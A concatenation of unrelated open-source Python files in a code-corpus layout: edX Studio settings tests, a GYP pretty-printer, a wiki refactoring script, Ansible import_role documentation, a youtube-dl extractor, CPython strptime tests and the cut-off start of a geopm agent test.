Helper function that checks if the validation modal contains correct
error messages.
"""
# Check presence of modal
self.assertTrue(self.advanced_settings.is_validation_modal_present())
# List of wrong settings item & what is presented in the modal should be the same
error_item_names = self.advanced_settings.get_error_item_names()
self.assertEqual(set(wrong_settings_list), set(error_item_names))
error_item_messages = self.advanced_settings.get_error_item_messages()
self.assertEqual(len(error_item_names), len(error_item_messages))
def get_settings_fields_of_each_type(self):
"""
Get one of each field type:
- String: Course Display Name
- List: Advanced Module List
- Dict: Discussion Topic Mapping
- Integer: Maximum Attempts
- Date: Course Announcement Date
"""
return {
"Course Display Name": self.advanced_settings.get('Course Display Name'),
"Advanced Module List": self.advanced_settings.get('Advanced Module List'),
"Discussion Topic Mapping": self.advanced_settings.get('Discussion Topic Mapping'),
"Maximum Attempts": self.advanced_settings.get('Maximum Attempts'),
"Course Announcement Date": self.advanced_settings.get('Course Announcement Date'),
}
def set_wrong_inputs_to_fields(self):
"""
Set wrong values for the chosen fields
"""
self.advanced_settings.set_values(
{
"Course Display Name": 1,
"Advanced Module List": 1,
"Discussion Topic Mapping": 1,
"Maximum Attempts": '"string"',
"Course Announcement Date": '"string"',
}
)
def test_only_expected_fields_are_displayed(self):
"""
Scenario: The Advanced Settings screen displays settings/fields not specifically hidden from
view by a developer.
Given I have a set of CourseMetadata fields defined for the course
When I view the Advanced Settings screen for the course
The total number of fields displayed matches the number I expect
And the actual fields displayed match the fields I expect to see
"""
expected_fields = self.advanced_settings.expected_settings_names
displayed_fields = self.advanced_settings.displayed_settings_names
self.assertEquals(set(displayed_fields), set(expected_fields))
@attr('shard_1')
class ContentLicenseTest(StudioCourseTest):
"""
Tests for course-level licensing (that is, setting the license,
for an entire course's content, to All Rights Reserved or Creative Commons)
"""
def setUp(self): # pylint: disable=arguments-differ
super(ContentLicenseTest, self).setUp()
self.outline_page = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.settings_page = SettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.lms_courseware = CoursewarePage(
self.browser,
self.course_id,
)
self.settings_page.visit()
def test_empty_license(self):
"""
When I visit the Studio settings page,
I see that the course license is "All Rights Reserved" by default.
Then I visit the LMS courseware page,
and I see that the default course license is displayed.
"""
self.assertEqual(self.settings_page.course_license, "All Rights Reserved")
self.lms_courseware.visit()
self.assertEqual(self.lms_courseware.course_license, "© All Rights Reserved")
def test_arr_license(self):
"""
When I visit the Studio settings page,
and I set the course license to "All Rights Reserved",
and I refresh the page,
I see that the course license is "All Rights Reserved".
Then I visit the LMS courseware page,
and I see that the course license is "All Rights Reserved".
"""
self.settings_page.course_license = "All Rights Reserved"
self.settings_page.save_changes()
self.settings_page.refresh_and_wait_for_load()
self.assertEqual(self.settings_page.course_license, "All Rights Reserved")
self.lms_courseware.visit()
self.assertEqual(self.lms_courseware.course_license, "© All Rights Reserved")
def test_cc_license(self):
"""
When I visit the Studio settings page,
and I set the course license to "Creative Commons",
and I refresh the page,
I see that the course license is "Creative Commons".
Then I visit the LMS courseware page,
and I see that the course license is "Some Rights Reserved".
"""
self.settings_page.course_license = "Creative Commons"
self.settings_page.save_changes()
self.settings_page.refresh_and_wait_for_load()
self.assertEqual(self.settings_page.course_license, "Creative Commons")
self.lms_courseware.visit()
# The course_license text will include a bunch of screen reader text to explain
# the selected options
self.assertIn("Some Rights Reserved", self.lms_courseware.course_license)
|
agpl-3.0
|
hseifeddine/dashviz-mean
|
node_modules/node-gyp/gyp/tools/pretty_gyp.py
|
2618
|
4756
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Pretty-prints the contents of a GYP file."""
import sys
import re
# Regex to remove comments when we're counting braces.
COMMENT_RE = re.compile(r'\s*#.*')
# Regex to remove quoted strings when we're counting braces.
# It takes into account quoted quotes, and makes sure that the quotes match.
# NOTE: It does not handle quotes that span more than one line, or
# cases where an escaped quote is preceeded by an escaped backslash.
QUOTE_RE_STR = r'(?P<q>[\'"])(.*?)(?<![^\\][\\])(?P=q)'
QUOTE_RE = re.compile(QUOTE_RE_STR)
def comment_replace(matchobj):
return matchobj.group(1) + matchobj.group(2) + '#' * len(matchobj.group(3))
def mask_comments(input):
"""Mask the quoted strings so we skip braces inside quoted strings."""
search_re = re.compile(r'(.*?)(#)(.*)')
return [search_re.sub(comment_replace, line) for line in input]
def quote_replace(matchobj):
return "%s%s%s%s" % (matchobj.group(1),
matchobj.group(2),
'x'*len(matchobj.group(3)),
matchobj.group(2))
def mask_quotes(input):
"""Mask the quoted strings so we skip braces inside quoted strings."""
search_re = re.compile(r'(.*?)' + QUOTE_RE_STR)
return [search_re.sub(quote_replace, line) for line in input]
def do_split(input, masked_input, search_re):
output = []
mask_output = []
for (line, masked_line) in zip(input, masked_input):
m = search_re.match(masked_line)
while m:
split = len(m.group(1))
line = line[:split] + r'\n' + line[split:]
masked_line = masked_line[:split] + r'\n' + masked_line[split:]
m = search_re.match(masked_line)
output.extend(line.split(r'\n'))
mask_output.extend(masked_line.split(r'\n'))
return (output, mask_output)
def split_double_braces(input):
"""Masks out the quotes and comments, and then splits appropriate
lines (lines that matche the double_*_brace re's above) before
indenting them below.
These are used to split lines which have multiple braces on them, so
that the indentation looks prettier when all laid out (e.g. closing
braces make a nice diagonal line).
"""
double_open_brace_re = re.compile(r'(.*?[\[\{\(,])(\s*)([\[\{\(])')
double_close_brace_re = re.compile(r'(.*?[\]\}\)],?)(\s*)([\]\}\)])')
masked_input = mask_quotes(input)
masked_input = mask_comments(masked_input)
(output, mask_output) = do_split(input, masked_input, double_open_brace_re)
(output, mask_output) = do_split(output, mask_output, double_close_brace_re)
return output
def count_braces(line):
"""keeps track of the number of braces on a given line and returns the result.
It starts at zero and subtracts for closed braces, and adds for open braces.
"""
open_braces = ['[', '(', '{']
close_braces = [']', ')', '}']
closing_prefix_re = re.compile(r'(.*?[^\s\]\}\)]+.*?)([\]\}\)],?)\s*$')
cnt = 0
stripline = COMMENT_RE.sub(r'', line)
stripline = QUOTE_RE.sub(r"''", stripline)
for char in stripline:
for brace in open_braces:
if char == brace:
cnt += 1
for brace in close_braces:
if char == brace:
cnt -= 1
after = False
if cnt > 0:
after = True
# This catches the special case of a closing brace having something
# other than just whitespace ahead of it -- we don't want to
# unindent that until after this line is printed so it stays with
# the previous indentation level.
if cnt < 0 and closing_prefix_re.match(stripline):
after = True
return (cnt, after)
def prettyprint_input(lines):
"""Does the main work of indenting the input based on the brace counts."""
indent = 0
basic_offset = 2
last_line = ""
for line in lines:
if COMMENT_RE.match(line):
print line
else:
line = line.strip('\r\n\t ') # Otherwise doesn't strip \r on Unix.
if len(line) > 0:
(brace_diff, after) = count_braces(line)
if brace_diff != 0:
if after:
print " " * (basic_offset * indent) + line
indent += brace_diff
else:
indent += brace_diff
print " " * (basic_offset * indent) + line
else:
print " " * (basic_offset * indent) + line
else:
print ""
last_line = line
def main():
if len(sys.argv) > 1:
data = open(sys.argv[1]).read().splitlines()
else:
data = sys.stdin.read().splitlines()
# Split up the double braces.
lines = split_double_braces(data)
# Indent and print the output.
prettyprint_input(lines)
return 0
if __name__ == '__main__':
sys.exit(main())
|
mit
|
101companies/101dev
|
tools/wikiRefactoring/refactor.py
|
4
|
1406
|
import sys
import getpass
from wikitools import wiki
import page2
import category2
apiurl = "http://mediawiki.101companies.org/api.php"
wiki101 = wiki.Wiki(apiurl)
def dorename(titles, flags):
if len(titles) < 2:
exit("Need two titles to do renaming")
if titles[0].startswith("Category:"):
p = category2.Category2(wiki101, title=titles[0])
else:
p = page2.Page2(wiki101, title=titles[0])
p.intermove(mvto=titles[1], **flags)
def dopromote(titles, flags):
p = page2.Page2(wiki101, title=titles[0])
if len(titles) > 1:
ntitle = titles[1]
else:
ntitle = False
p.promote(title=ntitle, **flags)
def dodemote(titles, flags):
p = category2.Category2(wiki101, title=titles[0])
if len(titles) > 1:
ntitle = titles[1]
else:
ntitle = False
p.demote(title=ntitle, **flags)
commands = dict(rename=dorename, promote=dopromote, demote=dodemote)
if len(sys.argv) < 3 or not commands.has_key(sys.argv[1]):
exit("Syntax: (rename|demote|promote) <title1> [<title2>] [-- <flags>]")
if (len(sys.argv) > 3 and sys.argv[3] == "--"):
titles = sys.argv[2:3]
rawflags = sys.argv[4:]
elif (len(sys.argv) > 4 and sys.argv[4] == "--"):
titles = sys.argv[2:4]
rawflags = sys.argv[5:]
else:
titles = sys.argv[2:]
rawflags = []
flags = {}
for flag in rawflags:
flags[flag] = True
wiki101.login(raw_input("Wikisername: "), getpass.getpass("Password: "))
commands[sys.argv[1]](titles, flags)
|
gpl-3.0
|
sestrella/ansible
|
lib/ansible/modules/utilities/logic/import_role.py
|
28
|
2837
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'
}
DOCUMENTATION = r'''
---
author: Ansible Core Team (@ansible)
module: import_role
short_description: Import a role into a play
description:
- Much like the C(roles:) keyword, this task loads a role, but it allows you to control it when the role tasks run in
between other tasks of the play.
- Most keywords, loops and conditionals will only be applied to the imported tasks, not to this statement itself. If
you want the opposite behavior, use M(include_role) instead.
version_added: '2.4'
options:
name:
description:
- The name of the role to be executed.
type: str
required: true
tasks_from:
description:
- File to load from a role's C(tasks/) directory.
type: str
default: main
vars_from:
description:
- File to load from a role's C(vars/) directory.
type: str
default: main
defaults_from:
description:
- File to load from a role's C(defaults/) directory.
type: str
default: main
allow_duplicates:
description:
- Overrides the role's metadata setting to allow using a role more than once with the same parameters.
type: bool
default: yes
handlers_from:
description:
- File to load from a role's C(handlers/) directory.
type: str
default: main
version_added: '2.8'
notes:
- Handlers are made available to the whole play.
- Since Ansible 2.7 variables defined in C(vars) and C(defaults) for the role are exposed at playbook parsing time.
Due to this, these variables will be accessible to roles and tasks executed before the location of the
M(import_role) task.
- Unlike M(include_role) variable exposure is not configurable, and will always be exposed.
seealso:
- module: import_playbook
- module: import_tasks
- module: include_role
- module: include_tasks
- ref: playbooks_reuse_includes
description: More information related to including and importing playbooks, roles and tasks.
'''
EXAMPLES = r'''
- hosts: all
tasks:
- import_role:
name: myrole
- name: Run tasks/other.yaml instead of 'main'
import_role:
name: myrole
tasks_from: other
- name: Pass variables to role
import_role:
name: myrole
vars:
rolevar1: value from task
- name: Apply condition to each task in role
import_role:
name: myrole
when: not idontwanttorun
'''
RETURN = r'''
# This module does not return anything except tasks to execute.
'''
|
gpl-3.0
|
phihag/youtube-dl
|
youtube_dl/extractor/echomsk.py
|
90
|
1317
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
class EchoMskIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?echo\.msk\.ru/sounds/(?P<id>\d+)'
_TEST = {
'url': 'http://www.echo.msk.ru/sounds/1464134.html',
'md5': '2e44b3b78daff5b458e4dbc37f191f7c',
'info_dict': {
'id': '1464134',
'ext': 'mp3',
'title': 'Особое мнение - 29 декабря 2014, 19:08',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
audio_url = self._search_regex(
r'<a rel="mp3" href="([^"]+)">', webpage, 'audio URL')
title = self._html_search_regex(
r'<a href="/programs/[^"]+" target="_blank">([^<]+)</a>',
webpage, 'title')
air_date = self._html_search_regex(
r'(?s)<div class="date">(.+?)</div>',
webpage, 'date', fatal=False, default=None)
if air_date:
air_date = re.sub(r'(\s)\1+', r'\1', air_date)
if air_date:
title = '%s - %s' % (title, air_date)
return {
'id': video_id,
'url': audio_url,
'title': title,
}
|
unlicense
|
xbmc/xbmc-antiquated
|
xbmc/lib/libPython/Python/Lib/test/test_strptime.py
|
12
|
23211
|
"""PyUnit testing against strptime"""
import unittest
import time
import locale
import re
import sys
from test import test_support
from datetime import date as datetime_date
import _strptime
class getlang_Tests(unittest.TestCase):
"""Test _getlang"""
def test_basic(self):
self.failUnlessEqual(_strptime._getlang(), locale.getlocale(locale.LC_TIME))
class LocaleTime_Tests(unittest.TestCase):
"""Tests for _strptime.LocaleTime.
All values are lower-cased when stored in LocaleTime, so make sure to
compare values after running ``lower`` on them.
"""
def setUp(self):
"""Create time tuple based on current time."""
self.time_tuple = time.localtime()
self.LT_ins = _strptime.LocaleTime()
def compare_against_time(self, testing, directive, tuple_position,
error_msg):
"""Helper method that tests testing against directive based on the
tuple_position of time_tuple. Uses error_msg as error message.
"""
strftime_output = time.strftime(directive, self.time_tuple).lower()
comparison = testing[self.time_tuple[tuple_position]]
self.failUnless(strftime_output in testing, "%s: not found in tuple" %
error_msg)
self.failUnless(comparison == strftime_output,
"%s: position within tuple incorrect; %s != %s" %
(error_msg, comparison, strftime_output))
def test_weekday(self):
# Make sure that full and abbreviated weekday names are correct in
# both string and position with tuple
self.compare_against_time(self.LT_ins.f_weekday, '%A', 6,
"Testing of full weekday name failed")
self.compare_against_time(self.LT_ins.a_weekday, '%a', 6,
"Testing of abbreviated weekday name failed")
def test_month(self):
# Test full and abbreviated month names; both string and position
# within the tuple
self.compare_against_time(self.LT_ins.f_month, '%B', 1,
"Testing against full month name failed")
self.compare_against_time(self.LT_ins.a_month, '%b', 1,
"Testing against abbreviated month name failed")
def test_am_pm(self):
# Make sure AM/PM representation done properly
strftime_output = time.strftime("%p", self.time_tuple).lower()
self.failUnless(strftime_output in self.LT_ins.am_pm,
"AM/PM representation not in tuple")
if self.time_tuple[3] < 12: position = 0
else: position = 1
self.failUnless(strftime_output == self.LT_ins.am_pm[position],
"AM/PM representation in the wrong position within the tuple")
def test_timezone(self):
# Make sure timezone is correct
timezone = time.strftime("%Z", self.time_tuple).lower()
if timezone:
self.failUnless(timezone in self.LT_ins.timezone[0] or \
timezone in self.LT_ins.timezone[1],
"timezone %s not found in %s" %
(timezone, self.LT_ins.timezone))
def test_date_time(self):
# Check that LC_date_time, LC_date, and LC_time are correct
# the magic date is used so as to not have issues with %c when day of
# the month is a single digit and has a leading space. This is not an
# issue since strptime still parses it correctly. The problem is
# testing these directives for correctness by comparing strftime
# output.
magic_date = (1999, 3, 17, 22, 44, 55, 2, 76, 0)
strftime_output = time.strftime("%c", magic_date)
self.failUnless(strftime_output == time.strftime(self.LT_ins.LC_date_time,
magic_date),
"LC_date_time incorrect")
strftime_output = time.strftime("%x", magic_date)
self.failUnless(strftime_output == time.strftime(self.LT_ins.LC_date,
magic_date),
"LC_date incorrect")
strftime_output = time.strftime("%X", magic_date)
self.failUnless(strftime_output == time.strftime(self.LT_ins.LC_time,
magic_date),
"LC_time incorrect")
LT = _strptime.LocaleTime()
LT.am_pm = ('', '')
self.failUnless(LT.LC_time, "LocaleTime's LC directives cannot handle "
"empty strings")
def test_lang(self):
# Make sure lang is set to what _getlang() returns
# Assuming locale has not changed between now and when self.LT_ins was created
self.failUnlessEqual(self.LT_ins.lang, _strptime._getlang())
class TimeRETests(unittest.TestCase):
"""Tests for TimeRE."""
def setUp(self):
"""Construct generic TimeRE object."""
self.time_re = _strptime.TimeRE()
self.locale_time = _strptime.LocaleTime()
def test_pattern(self):
# Test TimeRE.pattern
pattern_string = self.time_re.pattern(r"%a %A %d")
self.failUnless(pattern_string.find(self.locale_time.a_weekday[2]) != -1,
"did not find abbreviated weekday in pattern string '%s'" %
pattern_string)
self.failUnless(pattern_string.find(self.locale_time.f_weekday[4]) != -1,
"did not find full weekday in pattern string '%s'" %
pattern_string)
self.failUnless(pattern_string.find(self.time_re['d']) != -1,
"did not find 'd' directive pattern string '%s'" %
pattern_string)
def test_pattern_escaping(self):
# Make sure any characters in the format string that might be taken as
# regex syntax is escaped.
pattern_string = self.time_re.pattern("\d+")
self.failUnless(r"\\d\+" in pattern_string,
"%s does not have re characters escaped properly" %
pattern_string)
def test_compile(self):
# Check that compiled regex is correct
found = self.time_re.compile(r"%A").match(self.locale_time.f_weekday[6])
self.failUnless(found and found.group('A') == self.locale_time.f_weekday[6],
"re object for '%A' failed")
compiled = self.time_re.compile(r"%a %b")
found = compiled.match("%s %s" % (self.locale_time.a_weekday[4],
self.locale_time.a_month[4]))
self.failUnless(found,
"Match failed with '%s' regex and '%s' string" %
(compiled.pattern, "%s %s" % (self.locale_time.a_weekday[4],
self.locale_time.a_month[4])))
self.failUnless(found.group('a') == self.locale_time.a_weekday[4] and
found.group('b') == self.locale_time.a_month[4],
"re object couldn't find the abbreviated weekday month in "
"'%s' using '%s'; group 'a' = '%s', group 'b' = %s'" %
(found.string, found.re.pattern, found.group('a'),
found.group('b')))
for directive in ('a','A','b','B','c','d','H','I','j','m','M','p','S',
'U','w','W','x','X','y','Y','Z','%'):
compiled = self.time_re.compile("%" + directive)
found = compiled.match(time.strftime("%" + directive))
self.failUnless(found, "Matching failed on '%s' using '%s' regex" %
(time.strftime("%" + directive),
compiled.pattern))
def test_blankpattern(self):
# Make sure when tuple or something has no values no regex is generated.
# Fixes bug #661354
test_locale = _strptime.LocaleTime()
test_locale.timezone = (frozenset(), frozenset())
self.failUnless(_strptime.TimeRE(test_locale).pattern("%Z") == '',
"with timezone == ('',''), TimeRE().pattern('%Z') != ''")
def test_matching_with_escapes(self):
# Make sure a format that requires escaping of characters works
compiled_re = self.time_re.compile("\w+ %m")
found = compiled_re.match("\w+ 10")
self.failUnless(found, "Escaping failed of format '\w+ 10'")
def test_locale_data_w_regex_metacharacters(self):
# Check that if locale data contains regex metacharacters they are
# escaped properly.
# Discovered by bug #1039270 .
locale_time = _strptime.LocaleTime()
locale_time.timezone = (frozenset(("utc", "gmt",
"Tokyo (standard time)")),
frozenset("Tokyo (daylight time)"))
time_re = _strptime.TimeRE(locale_time)
self.failUnless(time_re.compile("%Z").match("Tokyo (standard time)"),
"locale data that contains regex metacharacters is not"
" properly escaped")
class StrptimeTests(unittest.TestCase):
"""Tests for _strptime.strptime."""
def setUp(self):
"""Create testing time tuple."""
self.time_tuple = time.gmtime()
def test_TypeError(self):
# Make sure ValueError is raised when match fails
self.assertRaises(ValueError, _strptime.strptime, data_string="%d",
format="%A")
def test_unconverteddata(self):
# Check ValueError is raised when there is unconverted data
self.assertRaises(ValueError, _strptime.strptime, "10 12", "%m")
def helper(self, directive, position):
"""Helper fxn in testing."""
strf_output = time.strftime("%" + directive, self.time_tuple)
strp_output = _strptime.strptime(strf_output, "%" + directive)
self.failUnless(strp_output[position] == self.time_tuple[position],
"testing of '%s' directive failed; '%s' -> %s != %s" %
(directive, strf_output, strp_output[position],
self.time_tuple[position]))
def test_year(self):
# Test that the year is handled properly
for directive in ('y', 'Y'):
self.helper(directive, 0)
# Must also make sure %y values are correct for bounds set by Open Group
for century, bounds in ((1900, ('69', '99')), (2000, ('00', '68'))):
for bound in bounds:
strp_output = _strptime.strptime(bound, '%y')
expected_result = century + int(bound)
self.failUnless(strp_output[0] == expected_result,
"'y' test failed; passed in '%s' "
"and returned '%s'" % (bound, strp_output[0]))
def test_month(self):
# Test for month directives
for directive in ('B', 'b', 'm'):
self.helper(directive, 1)
def test_day(self):
# Test for day directives
self.helper('d', 2)
def test_hour(self):
# Test hour directives
self.helper('H', 3)
strf_output = time.strftime("%I %p", self.time_tuple)
strp_output = _strptime.strptime(strf_output, "%I %p")
self.failUnless(strp_output[3] == self.time_tuple[3],
"testing of '%%I %%p' directive failed; '%s' -> %s != %s" %
(strf_output, strp_output[3], self.time_tuple[3]))
def test_minute(self):
# Test minute directives
self.helper('M', 4)
def test_second(self):
# Test second directives
self.helper('S', 5)
def test_weekday(self):
# Test weekday directives
for directive in ('A', 'a', 'w'):
self.helper(directive,6)
def test_julian(self):
# Test julian directives
self.helper('j', 7)
def test_timezone(self):
# Test timezone directives.
# When gmtime() is used with %Z, entire result of strftime() is empty.
# Check for equal timezone names deals with bad locale info when this
# occurs; first found in FreeBSD 4.4.
strp_output = _strptime.strptime("UTC", "%Z")
self.failUnlessEqual(strp_output.tm_isdst, 0)
strp_output = _strptime.strptime("GMT", "%Z")
self.failUnlessEqual(strp_output.tm_isdst, 0)
if sys.platform == "mac":
# Timezones don't really work on MacOS9
return
time_tuple = time.localtime()
strf_output = time.strftime("%Z") #UTC does not have a timezone
strp_output = _strptime.strptime(strf_output, "%Z")
locale_time = _strptime.LocaleTime()
if time.tzname[0] != time.tzname[1] or not time.daylight:
self.failUnless(strp_output[8] == time_tuple[8],
"timezone check failed; '%s' -> %s != %s" %
(strf_output, strp_output[8], time_tuple[8]))
else:
self.failUnless(strp_output[8] == -1,
"LocaleTime().timezone has duplicate values and "
"time.daylight but timezone value not set to -1")
def test_bad_timezone(self):
# Explicitly test possibility of bad timezone;
# when time.tzname[0] == time.tzname[1] and time.daylight
if sys.platform == "mac":
return #MacOS9 has severely broken timezone support.
tz_name = time.tzname[0]
if tz_name.upper() in ("UTC", "GMT"):
return
try:
original_tzname = time.tzname
original_daylight = time.daylight
time.tzname = (tz_name, tz_name)
time.daylight = 1
tz_value = _strptime.strptime(tz_name, "%Z")[8]
self.failUnlessEqual(tz_value, -1,
"%s lead to a timezone value of %s instead of -1 when "
"time.daylight set to %s and passing in %s" %
(time.tzname, tz_value, time.daylight, tz_name))
finally:
time.tzname = original_tzname
time.daylight = original_daylight
def test_date_time(self):
# Test %c directive
for position in range(6):
self.helper('c', position)
def test_date(self):
# Test %x directive
for position in range(0,3):
self.helper('x', position)
def test_time(self):
# Test %X directive
for position in range(3,6):
self.helper('X', position)
def test_percent(self):
# Make sure % signs are handled properly
strf_output = time.strftime("%m %% %Y", self.time_tuple)
strp_output = _strptime.strptime(strf_output, "%m %% %Y")
self.failUnless(strp_output[0] == self.time_tuple[0] and
strp_output[1] == self.time_tuple[1],
"handling of percent sign failed")
def test_caseinsensitive(self):
# Should handle names case-insensitively.
strf_output = time.strftime("%B", self.time_tuple)
self.failUnless(_strptime.strptime(strf_output.upper(), "%B"),
"strptime does not handle ALL-CAPS names properly")
self.failUnless(_strptime.strptime(strf_output.lower(), "%B"),
"strptime does not handle lowercase names properly")
self.failUnless(_strptime.strptime(strf_output.capitalize(), "%B"),
"strptime does not handle capword names properly")
def test_defaults(self):
# Default return value should be (1900, 1, 1, 0, 0, 0, 0, 1, 0)
defaults = (1900, 1, 1, 0, 0, 0, 0, 1, -1)
strp_output = _strptime.strptime('1', '%m')
self.failUnless(strp_output == defaults,
"Default values for strptime() are incorrect;"
" %s != %s" % (strp_output, defaults))
def test_escaping(self):
# Make sure all characters that have regex significance are escaped.
# Parentheses are in a purposeful order; will cause an error of
# unbalanced parentheses when the regex is compiled if they are not
# escaped.
# Test instigated by bug #796149 .
need_escaping = ".^$*+?{}\[]|)("
self.failUnless(_strptime.strptime(need_escaping, need_escaping))
class Strptime12AMPMTests(unittest.TestCase):
"""Test a _strptime regression in '%I %p' at 12 noon (12 PM)"""
def test_twelve_noon_midnight(self):
eq = self.assertEqual
eq(time.strptime('12 PM', '%I %p')[3], 12)
eq(time.strptime('12 AM', '%I %p')[3], 0)
eq(_strptime.strptime('12 PM', '%I %p')[3], 12)
eq(_strptime.strptime('12 AM', '%I %p')[3], 0)
class JulianTests(unittest.TestCase):
"""Test a _strptime regression that all julian (1-366) are accepted"""
def test_all_julian_days(self):
eq = self.assertEqual
for i in range(1, 367):
# use 2004, since it is a leap year, we have 366 days
eq(_strptime.strptime('%d 2004' % i, '%j %Y')[7], i)
class CalculationTests(unittest.TestCase):
"""Test that strptime() fills in missing info correctly"""
def setUp(self):
self.time_tuple = time.gmtime()
def test_julian_calculation(self):
# Make sure that when Julian is missing that it is calculated
format_string = "%Y %m %d %H %M %S %w %Z"
result = _strptime.strptime(time.strftime(format_string, self.time_tuple),
format_string)
self.failUnless(result.tm_yday == self.time_tuple.tm_yday,
"Calculation of tm_yday failed; %s != %s" %
(result.tm_yday, self.time_tuple.tm_yday))
def test_gregorian_calculation(self):
# Test that Gregorian date can be calculated from Julian day
format_string = "%Y %H %M %S %w %j %Z"
result = _strptime.strptime(time.strftime(format_string, self.time_tuple),
format_string)
self.failUnless(result.tm_year == self.time_tuple.tm_year and
result.tm_mon == self.time_tuple.tm_mon and
result.tm_mday == self.time_tuple.tm_mday,
"Calculation of Gregorian date failed;"
"%s-%s-%s != %s-%s-%s" %
(result.tm_year, result.tm_mon, result.tm_mday,
self.time_tuple.tm_year, self.time_tuple.tm_mon,
self.time_tuple.tm_mday))
def test_day_of_week_calculation(self):
# Test that the day of the week is calculated as needed
format_string = "%Y %m %d %H %S %j %Z"
result = _strptime.strptime(time.strftime(format_string, self.time_tuple),
format_string)
self.failUnless(result.tm_wday == self.time_tuple.tm_wday,
"Calculation of day of the week failed;"
"%s != %s" % (result.tm_wday, self.time_tuple.tm_wday))
def test_week_of_year_and_day_of_week_calculation(self):
# Should be able to infer date if given year, week of year (%U or %W)
# and day of the week
def test_helper(ymd_tuple, test_reason):
for directive in ('W', 'U'):
format_string = "%%Y %%%s %%w" % directive
dt_date = datetime_date(*ymd_tuple)
strp_input = dt_date.strftime(format_string)
strp_output = _strptime.strptime(strp_input, format_string)
self.failUnless(strp_output[:3] == ymd_tuple,
"%s(%s) test failed w/ '%s': %s != %s (%s != %s)" %
(test_reason, directive, strp_input,
strp_output[:3], ymd_tuple,
strp_output[7], dt_date.timetuple()[7]))
test_helper((1901, 1, 3), "week 0")
test_helper((1901, 1, 8), "common case")
test_helper((1901, 1, 13), "day on Sunday")
test_helper((1901, 1, 14), "day on Monday")
test_helper((1905, 1, 1), "Jan 1 on Sunday")
test_helper((1906, 1, 1), "Jan 1 on Monday")
test_helper((1906, 1, 7), "first Sunday in a year starting on Monday")
test_helper((1905, 12, 31), "Dec 31 on Sunday")
test_helper((1906, 12, 31), "Dec 31 on Monday")
test_helper((2008, 12, 29), "Monday in the last week of the year")
test_helper((2008, 12, 22), "Monday in the second-to-last week of the "
"year")
test_helper((1978, 10, 23), "randomly chosen date")
test_helper((2004, 12, 18), "randomly chosen date")
test_helper((1978, 10, 23), "year starting and ending on Monday while "
"date not on Sunday or Monday")
test_helper((1917, 12, 17), "year starting and ending on Monday with "
"a Monday not at the beginning or end "
"of the year")
test_helper((1917, 12, 31), "Dec 31 on Monday with year starting and "
"ending on Monday")
class CacheTests(unittest.TestCase):
"""Test that caching works properly."""
def test_time_re_recreation(self):
# Make sure cache is recreated when current locale does not match what
# cached object was created with.
_strptime.strptime("10", "%d")
_strptime.strptime("2005", "%Y")
_strptime._TimeRE_cache.locale_time.lang = "Ni"
original_time_re = id(_strptime._TimeRE_cache)
_strptime.strptime("10", "%d")
self.failIfEqual(original_time_re, id(_strptime._TimeRE_cache))
self.failUnlessEqual(len(_strptime._regex_cache), 1)
def test_regex_cleanup(self):
# Make sure cached regexes are discarded when cache becomes "full".
try:
del _strptime._regex_cache['%d']
except KeyError:
pass
bogus_key = 0
while len(_strptime._regex_cache) <= _strptime._CACHE_MAX_SIZE:
_strptime._regex_cache[bogus_key] = None
bogus_key += 1
_strptime.strptime("10", "%d")
self.failUnlessEqual(len(_strptime._regex_cache), 1)
def test_new_localetime(self):
# A new LocaleTime instance should be created when a new TimeRE object
# is created.
locale_time_id = id(_strptime._TimeRE_cache.locale_time)
_strptime._TimeRE_cache.locale_time.lang = "Ni"
_strptime.strptime("10", "%d")
self.failIfEqual(locale_time_id,
id(_strptime._TimeRE_cache.locale_time))
def test_main():
test_support.run_unittest(
getlang_Tests,
LocaleTime_Tests,
TimeRETests,
StrptimeTests,
Strptime12AMPMTests,
JulianTests,
CalculationTests,
CacheTests
)
if __name__ == '__main__':
test_main()
|
gpl-2.0
|
geopm/geopm
|
scripts/test/TestAgent.py
|
1
|
2853
|
#!/usr/bin/env python3
#
# Copyright (c) 2015 - 2021, Intel Corporation
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY LOG OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import absolute_import
import unittest
import json
import geopmpy.agent
class TestAgent(unittest.TestCase):
def test_policy_names(self):
for agent in geopmpy.agent.names():
policy = geopmpy.agent.policy_names(agent)
self.assertTrue(type(policy) is list)
def test_sample_names(self):
for agent in geopmpy.agent.names():
sample = geopmpy.agent.sample_names(agent)
